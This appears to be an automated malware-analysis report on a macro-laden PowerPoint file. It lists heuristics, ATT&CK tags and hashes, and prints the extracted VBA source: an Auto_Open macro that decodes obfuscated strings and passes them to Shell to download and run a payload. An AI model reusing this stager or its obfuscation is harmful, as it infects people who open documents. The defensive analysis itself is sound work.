MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is an OOXML document containing a VBA macro that automatically executes upon opening. The macro utilizes character-shifting and concatenation to obfuscate a call to the Shell function, which is then used to execute a command. The reconstructed command is 'wjdwdowwjdaalijwdlidj', indicating the execution of a payload. This behavior is characteristic of macro-based malware designed to download and run additional malicious content.
Heuristics 5
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELLVBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2956 bytes |
SHA-256: ce90e1a54a5ef0ca85a2894ad2202a61e021c591f52efd026051dd96630b3346 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
Debug.Print MsgBox(qXglP77Xz("LYYVY(", "7"), vbOKCancel); returns; 1
Dim ynqvxPcX4 As String
Dim IztWb1wSm As String
Dim xrFCm28Ci As String
ynqvxPcX4 = qXglP77Xz("KBd qvlw {d{�{|mu;:dkitk6m€md66du{p|i(", "8")
IztWb1wSm = qXglP77Xz("jvvru<11yyy0dkvn{0eqo1", "2")
xrFCm28Ci = "wjdwdowwjdaalijwdlidj"
Debug.Print ynqvxPcX4
Debug.Print IztWb1wSm
Debug.Print xrFCm28Ci
Debug.Print (Shell(ynqvxPcX4 + IztWb1wSm + xrFCm28Ci))
End Sub
Public Function qXglP77Xz(UE2EtbVNL As String, Rb47W0TWO As Integer)
Dim wDJHxwWIO As Integer
For wDJHxwWIO = 1 To Len(UE2EtbVNL)
GoTo hFAdfMSltiOKKINFMd
hFAdfMSltiOKKINFMd:
GoTo piepGUqeoLGklRmrzpU:
olThGGiqDfeCTuUgasbxhsyuF:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo mtvEcQACjpIQFlhhfkVc
mQrdtwzrPtYDsMCtHRAAnaBYkygx:
GoTo BbOMGZVsOntpAD
dQpmIfDvrDTjEsBZTxz:
PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"
GoTo RRgXZRqTwydSmdUhsb
RRgXZRqTwydSmdUhsb:
GoTo fdiFLSxKJagYwLEpQZtV
TvPuSkwlicurOyIOK:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo noJLUsZCSzFZhVBxxwAm
noJLUsZCSzFZhVBxxwAm:
Mid(UE2EtbVNL, wDJHxwWIO, 1) = Chr(Asc(Mid(UE2EtbVNL, wDJHxwWIO, 1)) - Rb47W0TWO)
GoTo mQrdtwzrPtYDsMCtHRAAnaBYkygx
mtvEcQACjpIQFlhhfkVc:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo AbaqgjbzdHFnwmdrBkkQQy
piepGUqeoLGklRmrzpU:
PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"
GoTo aOOpwKmGlJbnbZTliF
aOOpwKmGlJbnbZTliF:
GoTo olThGGiqDfeCTuUgasbxhsyuF
REfBAdJcNRr:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo dQpmIfDvrDTjEsBZTxz
AbaqgjbzdHFnwmdrBkkQQy:
wxGfLpElrKSIojk = "nYQCdOfjldCfJ"
GoTo oAFCNefBCLjQtJpyPX
oAFCNefBCLjQtJpyPX:
GoTo TvPuSkwlicurOyIOK
uHGQbeUuJCmTVrTYmwQ:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo REfBAdJcNRr
BbOMGZVsOntpAD:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo opzIDhwPkCxmSbcafPJ
opzIDhwPkCxmSbcafPJ:
wxGfLpElrKSIojk = "nYQCdOfjldCfJ"
GoTo NsnomrcVdHiTjnphHj
NsnomrcVdHiTjnphHj:
GoTo uHGQbeUuJCmTVrTYmwQ
fdiFLSxKJagYwLEpQZtV:
Next wDJHxwWIO
GoTo OuiDtkJrreRrObpWna
OuiDtkJrreRrObpWna:
GoTo VsOntpADSopzIDhwPkCx:
hnuZmlBFHzZngQyAU:
qXglP77Xz = UE2EtbVNL
GoTo CPMvIiiJRfGbFev
iLNtNTbQwFGE:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo hnuZmlBFHzZngQyAU
QkshMIIHLxDKcCBRH:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo CbEjhODYNESdLLyza
sgRtPOqYpbf:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo grlDAQsQJFQixSFP
CPMvIiiJRfGbFev:
GoTo wHBTCaJTaVhyNUQgDyce
vQrVuMYMJDV:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo qakqmyOPlnwTBeubhAI
grlDAQsQJFQixSFP:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo iLNtNTbQwFGE
VsOntpADSopzIDhwPkCx:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo rjHQPzikEhmzJ
rjHQPzikEhmzJ:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo sgRtPOqYpbf
CbEjhODYNESdLLyza:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo vQrVuMYMJDV
wHBTCaJTaVhyNUQgDyce:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo QkshMIIHLxDKcCBRH
qakqmyOPlnwTBeubhAI:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo SbcafPJQuHGQ
SbcafPJQuHGQ:
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 19456 bytes |
SHA-256: 5b4c471473c9b10f421dc4ea01d5e564241203922368448e1b789c003b2bbac6 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.